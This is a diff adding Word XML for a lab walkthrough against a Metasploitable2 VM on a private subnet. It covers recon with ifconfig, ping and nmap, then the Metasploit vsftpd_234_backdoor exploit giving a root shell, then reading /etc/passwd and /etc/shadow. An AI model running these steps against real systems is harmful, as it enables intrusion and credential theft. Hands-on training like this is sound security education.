+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">The first step for any good hacker is always the recon phase. You need to scope out the environment to see what options are available. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Step 1: Confirm Network Configuration</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">On each VM, open a terminal and run </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ifconfig</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> (or </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> a on newer systems) to confirm their IP addresses. Make sure both are on the same subnet provided by the host-only adapter.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E03A02A" wp14:editId="3359D715">
+            <wp:extent cx="5372100" cy="2186940"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1287075777" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1287075777" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId32"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5372100" cy="2186940"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Here we see that both have the same subnet</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (192.168.56.x)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>which is necessary for communication</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> and hacking process. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Step 2: Test Connectivity</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">In </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ParrotOSnot</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> already open.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Type the following command to ping Metasploitable2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01C6ED87" wp14:editId="4793124F">
+            <wp:extent cx="5649113" cy="2276793"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="570065032" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="570065032" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId33"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5649113" cy="2276793"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>You should see responses indicating successful packet transfers. If you receive replies, it confirms that Parrot OS can communicate with Metasploitable2.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Step 3: Basic Network Scanning with Nmap</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Open a terminal in Parrot OS (if not already open).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Run an Nmap scan to detect open ports and services on Metasploitable2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25453628" wp14:editId="62361E13">
+            <wp:extent cx="4838700" cy="2461260"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="2143579760" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="2143579760" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId34"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4838700" cy="2461260"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>This will give you a sum of the vulnerabilities inside of the Metasploitable2 VM.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Note any services that are outdated or known to be vulnerable—these will be your targets for exploitation.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Step 5: Exploiting Vulnerabilities</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> – Hacking process begins </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Choose a service to exploit based on the Nmap results. For example, if you found an outdated FTP service, you might consider using an exploit from Metasploit:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Launch </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>msfconsole</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>search ftp</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Choose an exploit and configure it</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>use exploit/[path]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>set RHOSTS 192.168.56.101</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>set RPORT [port number of the vulnerable service]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>exploit</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Step </w:t>
+      </w:r>
+      <w:r>
+        <w:t>6</w:t>
+      </w:r>
+      <w:r>
+        <w:t>: Configure the Exploit in Metasploit</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Load the Exploit:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:ind w:left="1080"/>
+      </w:pPr>
+      <w:r>
+        <w:t>use exploit/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>unix</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/ftp/vsftpd_234_backdoor</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Set the Target Host (RHOSTS): Set the IP address of the Metasploitable2 VM.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:ind w:left="1080"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>set RHOSTS 192.168.56.101</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Set the Target Port (RPORT): Assuming the FTP service is running on the default FTP port (21), set the RPORT.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:ind w:left="1080"/>
+      </w:pPr>
+      <w:r>
+        <w:t>set RPORT 21</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Run the Exploit:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:ind w:left="1080"/>
+      </w:pPr>
+      <w:r>
+        <w:t>E</w:t>
+      </w:r>
+      <w:r>
+        <w:t>xploit</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42D742BF" wp14:editId="7A92B212">
+            <wp:extent cx="5943600" cy="1480185"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1583055409" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1583055409" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId35"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="1480185"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>vsftpd_234_backdoor exploit has successfully run, and you have gained a command shell session on the target Metasploitable2 machine.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Next Steps: Interacting with the Command Shell</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Backgrounding the Session</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:ind w:left="1080"/>
+      </w:pPr>
+      <w:r>
+        <w:t>b</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ackground </w:t>
+      </w:r>
+      <w:r>
+        <w:t>then prompt y when asked to confirm</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>List Active Sessions Again</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:ind w:left="1080"/>
+      </w:pPr>
+      <w:r>
+        <w:t>sessions -l</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:ind w:left="1080"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14226923" wp14:editId="480682C9">
+            <wp:extent cx="5943600" cy="1406525"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1137717973" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1137717973" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId36"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="1406525"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:ind w:left="1080"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Interact with the Session Again</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:ind w:left="1080"/>
+      </w:pPr>
+      <w:r>
+        <w:t>sessions -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FE3E786" wp14:editId="1104D93A">
+            <wp:extent cx="5943600" cy="660400"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1673513450" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1673513450" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId37"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="660400"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Verify Access and System Information</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Whoami</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>uname</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -a</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ifconfig</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>ls /</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>cat /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/passwd</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>cat /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/shadow</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>cd /home</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>ls</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D9A3380" wp14:editId="03A156A5">
+            <wp:extent cx="5943600" cy="3344545"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1877451459" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1877451459" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId38"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3344545"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The commands confirm root access and provide details about the system and network configuration, indicating successful exploitation.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17A61306" wp14:editId="3CD4B810">
+            <wp:extent cx="4448175" cy="3040380"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1847264628" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1847264628" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId39"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4448797" cy="3040805"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The command lists various directories and files at the root level of the file system, giving an overview of the system's structure.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
